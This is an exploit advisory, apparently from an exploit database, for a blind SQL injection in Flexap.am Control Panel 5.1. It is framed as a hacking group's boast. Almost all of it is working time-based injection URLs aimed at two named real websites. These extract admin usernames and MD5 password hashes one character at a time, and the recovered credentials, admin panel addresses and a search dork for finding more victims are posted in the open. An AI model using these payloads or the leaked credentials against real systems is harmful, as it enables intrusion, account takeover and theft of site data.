Vulners
Lucene search
Flexap.am Control Panel 5.1 Blind SQL Injection
`=====================================================
Vulnerable software: Control Panel version 5.1
Vendor: http://www.flexap.am/
Vuln type: Blind SQL Injection
Software License: Commercial
Software: Control Panel version 5.1
Discovered and Exploited in Wild
=====================================================
Dork: Developed by flexap.am
=====================================================
************** FOR OUR BRO RAMIL SEFEROV! ************************
@OPERATION BY AZERBAIJAN BLACK HATZ: *WIPEN'EM purgens!*
I'M=> AkaStep<= RESPONSIBLE FOR EVERYTHING IN THIS advisory=
********************** REALLY! ********************************************
******************ENJOY MAXIMALLY**************************************
=====================================================
http://dua.am/cms <=Admin panel
Real exploitation example:
Time Based Always RuleZ!
//TRUE
http://www.dua.am/am/news/50'or sleep(10)-- and 5='5/
cms: http://www.dua.am/
//TRUE
www.dua.am/am/news/50' or (select if(substr(column_name,1,13)='ulist_login',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 3,1)-- AnD 5='5
logini cekek:
http://www.dua.am/am/news/50%27%20or%20%28select%20if%28substr%28%60ulist_login%60,1,1%29=%27a%27,sleep%281%29,0%29%20from%20ulist%20limit%201%29--%20AnD%20%205=%275
1-ci simvol:
a
//TRUE
http://www.dua.am/am/news/50' or (select if(substr(`ulist_login`,1,1)='a',sleep(1),0) from ulist limit 1)-- AnD 5='5
2-ci simvol: d
http://www.dua.am/am/news/50' or (select if(substr(`ulist_login`,2,1)='d',sleep(1),0) from ulist limit 1)-- AnD 5='5
3-cu simvol: m
http://www.dua.am/am/news/50' or (select if(substr(`ulist_login`,3,1)='m',sleep(1),0) from ulist limit 1)-- AnD 5='5
4-cu simvol: d
http://www.dua.am/am/news/50' or (select if(substr(`ulist_login`,4,1)='d',sleep(1),0) from ulist limit 1)-- AnD 5='5
5-ci simvol: u
http://www.dua.am/am/news/50' or (select if(substr(`ulist_login`,5,1)='u',sleep(1),0) from ulist limit 1)-- AnD 5='5
6-ci simvol: a
http://www.dua.am/am/news/50' or (select if(substr(`ulist_login`,6,1)='a',sleep(1),0) from ulist limit 1)-- AnD 5='5
Login: admdua
//TRUE
http://www.dua.am/am/news/50' or (select if(substr(`ulist_login`,1,15)='admdua',sleep(1),0) from ulist limit 1)-- AnD 5='5
Passi cekmeye getdik!
Pass deyesen ele budur:D
http://www.dua.am/am/news/50' or (select if(substr(`ulist_password`,1,33)='9578f5aa427b07bdd3a8549f929a4e31',sleep(1),0) from ulist limit 1)-- AnD 5='5
pass: Massword
mogin:Massword
===================================================================
Next another Demo:
Adminka: http://mkuzak.am/cms/
//TRUE
http://www.mkuzak.am/am/news/85%27%20or%20sleep%2810%29--%20and%205=%275/
//TRUE
http://www.mkuzak.am/am/news-8%27%20or%20sleep%281%29--%20and%205=%275/
Developed by <a href="http://www.flexap.am"
Bele olmalidir:
http://www.mkuzak.am/am/news/1' or (select if(count(table_name)='10',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61)-- AnD 5='5
24 table varimizdir:
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(count(table_name)='24',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61)-- AnD 5='5
1-ci tablein adi 8 simvolluqdur:
//TRUE
Cekek
1-ci tablein adinin 1ci herfi: c
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='c',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 1)-- AnD 5='5
2-ci simvolu (1-ci tablein adinin) : a
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,2,1)='a',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 1)-- AnD 5='5
3-cu simvolu: t
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,3,1)='t',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 1)-- AnD 5='5
Category?
Yoxlayaq:
1-ci tablein adi: category
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,12)='category',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 1)-- AnD 5='5
Ok indi qisaltmaga calisaq metodu:
pattern: adm
user
uzre:
http://www.mkuzak.am/am/news/1' or (select if(length(table_name)>'10',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 2,1)-- AnD 5='5
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,3)='adm',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 1)-- AnD 5='5
adm uzre butun neticeler LIMIT offsetlerde hamisi FALSE
qaldi user uzre. Edit: Ele user uzre de netice falsedir butun cehdlerde.
cms uzre axtaraq.
(select if(substr(table_name,1,3)='acms',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 2,1)-- AnD 5='5
Alinmasa isimiz uzanir.
ele uzandida isimiz icini sikim!
2-ci table name: 6 simvol uzunluqludur:
http://www.mkuzak.am/am/news/1' or (select if(length(table_name)='6',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 2,1)-- AnD 5='5
Cekek bu sikilmisi de.
1-ci simvolu: c
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='c',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 2,1)-- AnD 5='5
2-ci simvolu: o
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,2,1)='o',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 2,1)-- AnD 5='5
config?
2ci table name config:
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,8)='config',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 2,1)-- AnD 5='5
=======================================================================
3-cu table name: 3 simvol:
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(length(table_name)='3',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 3,1)-- AnD 5='5
1-ci simvolu: f
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='f',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 3,1)-- AnD 5='5
2-ci simvolu: a
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,2,1)='a',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 3,1)-- AnD 5='5
3-cu simvolu: q
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,3,1)='q',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 3,1)-- AnD 5='5
3-cu table name: faq
======================================================================
4-cu table name: 15 simvol uzunluqludur:
http://www.mkuzak.am/am/news/1' or (select if(length(table_name)='15',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 4,1)-- AnD 5='5
1-ci simvolu: f
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='f',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 4,1)-- AnD 5='5
2-ci simvolu:
a
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,2,1)='a',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 4,1)-- AnD 5='5
sikdirecek bu table
=======================================================================
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='u',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD 5='5
u herfine nese verir.
10 simvolludur:
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(length(table_name)='10',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD 5='5
1-ci simvolu: u
2-ci simvolu: l
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,2,1)='l',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD 5='5
3-cu simvolu: i
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,3,1)='i',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD 5='5
4-cu simvol: s
s
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,4,1)='s',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD 5='5
5-ci simvolu: t
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,5,1)='t',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD 5='5
6-ci simvol: _
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,6,1)='_',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD 5='5
7-ci simvol: t
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,7,1)='t',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD 5='5
8-ci simvol: y
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,8,1)='y',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD 5='5
9-cu simvol: p
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,9,1)='p',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 23,1)-- AnD 5='5
10-ci simvol:
table_name: ulist_type
===================================================================================================================
novbeti table:
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='u',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 22,1)-- AnD 5='5
Bu da
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='u',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 21,1)-- AnD 5='5
Bu da
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='u',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 20,1)-- AnD 5='5
Bu da
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,1)='u',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 19,1)-- AnD 5='5
============================= birinci herfi u olmaqla cemi 5 simvoldan ibaretdir. May be users?======================
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(length(table_name)='5',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 19,1)-- AnD 5='5
2-ci herfi: l
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,2,1)='l',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 19,1)-- AnD 5='5
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(table_name,1,6)='ulist',sleep(1),0) from information_schema.tables wheRe TABLE_SCHEMA!=0x696E666F726D6174696F6E5F736368656D61 limit 19,1)-- AnD 5='5
TABLE_NAME ulist
0x756C697374
http://www.mkuzak.am/am/news/1' or (select if(count(*)='1',sleep(1),0) from ulist)-- AnD 5='5
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(count(*)='2',sleep(1),0) from ulist)-- AnD 5='5
Ola bilsin ele budur cms-in adminkasina girmek ucun table
2 yazi var orda
COlumnlarina baxaq gorek ne veziyyetdedir.
http://www.mkuzak.am/am/news/1' or (select if(count(column_name)='1',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374)-- AnD 5='5
ulist tableinda 8 column var:
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(count(column_name)='8',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374)-- AnD 5='5
1-ci column name: 8 simvoldan ibaretdir
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(length(column_name)='8',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD 5='5
ulist tableinda 1-ci colum namein 1-ci simvolu: u
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,1,1)='u',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD 5='5
2-ci simvolu: l
http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,2,1)='l',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD 5='5
3-cu simvolu: i
http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,3,1)='i',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD 5='5
4-cu simvolu: s
http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,4,1)='s',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD 5='5
5-ci simvolu: t
http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,5,1)='t',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD 5='5
6-ci simvol: _
http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,6,1)='_',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD 5='5
1-ci column name full sekilde:
ulist_id
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,1,12)='ulist_id',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1)-- AnD 5='5
column prefix ulist_ dir demeli:
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,1,6)='ulist_',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1,1)-- AnD 5='5
Getdik bu sikilmis 2-ci columnu cekmeye:
name Uzunlugu 13 simvoldur:
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(length(column_name)='13',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1,1)-- AnD 5='5
http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,7,1)='t',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1,1)-- AnD 5='5
hal hazirda bu sekildedir:
ulist_t
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,8,1)='y',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 1,1)-- AnD 5='5
hal hazirda bu sekildedir:
ulist_typeXXX
axira getmirem imho sikdirmelidir bu column name
Novbeti column blyaaaaaaaaaaaaaaaaaaaaaa:(
============================================
3-cu column:
10 simvoldur name length
http://www.mkuzak.am/am/news/1' or (select if(length(column_name)='10',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 2,1)-- AnD 5='5
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,7,1)='n',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 2,1)-- AnD 5='5
ulist_n
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,8,1)='a',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 2,1)-- AnD 5='5
ulist_na
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,9,1)='m',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 2,1)-- AnD 5='5
ulist_nam
http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,10,1)='e',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 2,1)-- AnD 5='5
ulist_name
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,1,11)='ulist_name',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 2,1)-- AnD 5='5
==============================================================
Novbeti column:
11 simvolludur column name length
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(length(column_name)='11',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 3,1)-- AnD 5='5
Prefixi: ulist_ (-6)
Offset 7 den baslanmalidir substr()-de
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,1,13)='ulist_login',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 3,1)-- AnD 5='5
ulist_login
password-da cixsa sikmeye basliyardiq blyaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:(
Deyesen artiq duz tutmusam bunu:
http://www.mkuzak.am/am/news/1' or (select if(length(column_name)='14',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 4,1)-- AnD 5='5
Yeah!
Sikdik!
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(column_name,1,15)='ulist_password',sleep(1),0) from information_schema.columns wheRe TABLE_name=0x756C697374 limit 4,1)-- AnD 5='5
ulist_password
Neyimiz var:
ulist table-i
hemin tableda:
ulist_login
ulist_password
columnlari
Basliyaq...
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,1,15)='admin',sleep(1),0) from ulist limit 1)-- AnD 5='5
select length(`ulist_login`) from ulist limit 1
1-ci login name 9 simvoldan ibaretdir:
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(length(`ulist_login`)='9',sleep(1),0) from ulist limit 1)-- AnD 5='5
--------------------------------------------------------------------------------------------------------------------------------------------------------------
Loginin 1-ci simvolu: a
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,1,1)='a',sleep(1),0) from ulist limit 1)-- AnD 5='5
2ci simvolu: d
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,2,1)='d',sleep(1),0) from ulist limit 1)-- AnD 5='5
3cu simvol: m
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,3,1)='m',sleep(1),0) from ulist limit 1)-- AnD 5='5
4-cu simvol: m
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,4,1)='m',sleep(1),0) from ulist limit 1)-- AnD 5='5
5-ci simvol:
Login bu ola biler: admmkuzak
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,1,11)='admmkuzak',sleep(1),0) from ulist limit 1)-- AnD 5='5
Getdik passi firlatmaga...
Amma 1-ci sifrelenme algosunu yoxlayaq.
http://www.mkuzak.am/am/news/1' or (select if(length(`ulist_password`)='32',sleep(1),0) from ulist limit 1)-- AnD 5='5
//TRUE
MD5 SIFRELENME ALGOSU:
http://www.mkuzak.am/am/news/1' or (select if(length(`ulist_password`)='32',sleep(1),0) from ulist limit 1)-- AnD 5='5
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,1,1)='0',sleep(1),0) from ulist limit 1)-- AnD 5='5
admmkuzak adli soska xacikin parolu:
================================================
1-ci simvol: 9
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,1,1)='9',sleep(1),0) from ulist limit 1)-- AnD 5='5
================================================
2-ci simvol: 5
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,2,1)='5',sleep(1),0) from ulist limit 1)-- AnD 5='5
================================================
3-cu simvol: 7
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,3,1)='7',sleep(1),0) from ulist limit 1)-- AnD 5='5
================================================
4-cu simvol: 8
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,4,1)='8',sleep(1),0) from ulist limit 1)-- AnD 5='5
================================================
5-ci simvol: f
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,5,1)='f',sleep(1),0) from ulist limit 1)-- AnD 5='5
================================================
6-ci simvol: 5
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,6,1)='5',sleep(1),0) from ulist limit 1)-- AnD 5='5
================================================
7-ci simvol: a
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,7,1)='a',sleep(1),0) from ulist limit 1)-- AnD 5='5
================================================
8-ci simvol: a
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,8,1)='a',sleep(1),0) from ulist limit 1)-- AnD 5='5
================================================
9-cu simvol: 4
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,9,1)='4',sleep(1),0) from ulist limit 1)-- AnD 5='5
================================================
10-cu simvol: 2
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,10,1)='2',sleep(1),0) from ulist limit 1)-- AnD 5='5
================================================
11-ci simvol: 7
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,11,1)='7',sleep(1),0) from ulist limit 1)-- AnD 5='5
================================================
12-ci simvol: b (yoxla sonra)
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,12,1)='b',sleep(1),0) from ulist limit 1)-- AnD 5='5
================================================
13-cu simvol: 0
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,13,1)='0',sleep(1),0) from ulist limit 1)-- AnD 5='5
================================================
14-cu simvol: 7
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,14,1)='7',sleep(1),0) from ulist limit 1)-- AnD 5='5
================================================
15-ci simvol: b (yoxla sonra)
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,15,1)='b',sleep(1),0) from ulist limit 1)-- AnD 5='5
================================================
16-ci simvol: d
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,16,1)='d',sleep(1),0) from ulist limit 1)-- AnD 5='5
================================================
17-ci simvol: d
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,17,1)='d',sleep(1),0) from ulist limit 1)-- AnD 5='5
================================================
18-ci simvol: 3
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,18,1)='3',sleep(1),0) from ulist limit 1)-- AnD 5='5
================================================
19-cu simvol: a
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,19,1)='a',sleep(1),0) from ulist limit 1)-- AnD 5='5
================================================
20-ci simvol: 8
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,20,1)='8',sleep(1),0) from ulist limit 1)-- AnD 5='5
================================================
21-ci simvol: 5
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,21,1)='5',sleep(1),0) from ulist limit 1)-- AnD 5='5
================================================
yoxla sonra
22-ci simvol: 4
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,22,1)='4',sleep(1),0) from ulist limit 1)-- AnD 5='5
================================================
23-cu simvol: 9
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,23,1)='9',sleep(1),0) from ulist limit 1)-- AnD 5='5
================================================
yoxla sonra
24-cu simvol: f
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,24,1)='f',sleep(1),0) from ulist limit 1)-- AnD 5='5
================================================
25-ci simvol: 9
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,25,1)='9',sleep(1),0) from ulist limit 1)-- AnD 5='5
================================================
26-ci simvol: 2
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,26,1)='2',sleep(1),0) from ulist limit 1)-- AnD 5='5
================================================
27-ci simvol: 9
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,27,1)='9',sleep(1),0) from ulist limit 1)-- AnD 5='5
================================================
yoxla sonra
28-ci simvol: a
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,28,1)='a',sleep(1),0) from ulist limit 1)-- AnD 5='5
================================================
29-cu simvol: 4
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,29,1)='4',sleep(1),0) from ulist limit 1)-- AnD 5='5
================================================
30-cu simvol: e
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,30,1)='e',sleep(1),0) from ulist limit 1)-- AnD 5='5
================================================
31-ci simvol: 3
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,31,1)='3',sleep(1),0) from ulist limit 1)-- AnD 5='5
================================================
32-ci simvol: 1
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,32,1)='1',sleep(1),0) from ulist limit 1)-- AnD 5='5
================================================
Login: admmkuzak
MD5 HASH: 9578f5aa427b07bdd3a8549f929a4e31
PASS: Massword
Yoxlaya hashi:
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,1,33)='9578f5aa427b07bdd3a8549f929a4e31',sleep(1),0) from ulist limit 1)-- AnD 5='5
Blyaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa http://www.mkuzak.am/cms/ de deyir parol sehvdir:(
Belke role yoxdur bu userde?
2-ci user de olmalidir bu table da.
Variant yoxdur cekek:*(
Ikinci user name ucun:
http://www.mkuzak.am/am/news/1' or (select if(length(`ulist_login`)='5',sleep(1),0) from ulist limit 1,1)-- AnD 5='5
2-ci userin logininin
1-ci herfi:
m
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,1,1)='m',sleep(1),0) from ulist limit 1,1)-- AnD 5='5
2-ci herfi: o
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,2,1)='o',sleep(1),0) from ulist limit 1,1)-- AnD 5='5
3-cu herfi: g
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,3,1)='g',sleep(1),0) from ulist limit 1,1)-- AnD 5='5
4-cu herfi: i
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,4,1)='i',sleep(1),0) from ulist limit 1,1)-- AnD 5='5
5-ci simvol: n
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,5,1)='n',sleep(1),0) from ulist limit 1,1)-- AnD 5='5
umumi username ikinci user ucun:
mogin
Yoxlayaq?
//TRUE
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_login`,1,6)='mogin',sleep(1),0) from ulist limit 1,1)-- AnD 5='5
Passi getdik: Cekmeye yene blyaaaaaaaaaaaaaaaaa :*(
================================================
1-ci simvol: e
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,1,1)='e',sleep(1),0) from ulist limit 1,1)-- AnD 5='5
================================================
2-ci simvol: 7
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,2,1)='7',sleep(1),0) from ulist limit 1,1)-- AnD 5='5
================================================
yoxla sonra:
3-cu simvol: 9
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,3,1)='9',sleep(1),0) from ulist limit 1,1)-- AnD 5='5
================================================
4-cu simvol: d
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,4,1)='d',sleep(1),0) from ulist limit 1,1)-- AnD 5='5
================================================
5-ci simvol: 2
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,5,1)='2',sleep(1),0) from ulist limit 1,1)-- AnD 5='5
================================================
yoxla mutlwq
6-ci simvol: f
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,6,1)='f',sleep(1),0) from ulist limit 1,1)-- AnD 5='5
================================================
7-ci simvol: 3
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,7,1)='3',sleep(1),0) from ulist limit 1,1)-- AnD 5='5
================================================
yoxla sonra
8-ci simvol: 1
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,8,1)='1',sleep(1),0) from ulist limit 1,1)-- AnD 5='5
================================================
9-cu simvol: 5
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,9,1)='5',sleep(1),0) from ulist limit 1,1)-- AnD 5='5
================================================
10-cu simvol: e
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,10,1)='e',sleep(1),0) from ulist limit 1,1)-- AnD 5='5
================================================
11-ci simvol: 9
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,11,1)='9',sleep(1),0) from ulist limit 1,1)-- AnD 5='5
================================================
12-ci simvol: 9
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,12,1)='9',sleep(1),0) from ulist limit 1,1)-- AnD 5='5
================================================
13-cu simvol: c
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,13,1)='c',sleep(1),0) from ulist limit 1,1)-- AnD 5='5
================================================
14-cu simvol: a
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,14,1)='a',sleep(1),0) from ulist limit 1,1)-- AnD 5='5
================================================
15-ci simvol: c
http://www.mkuzak.am/am/news/1' or (select if(substr(`ulist_password`,15,1)='c',sleep(1),0) from ulist limit 1,1)-- AnD 5='5
================================================
16-ci simvol: 9
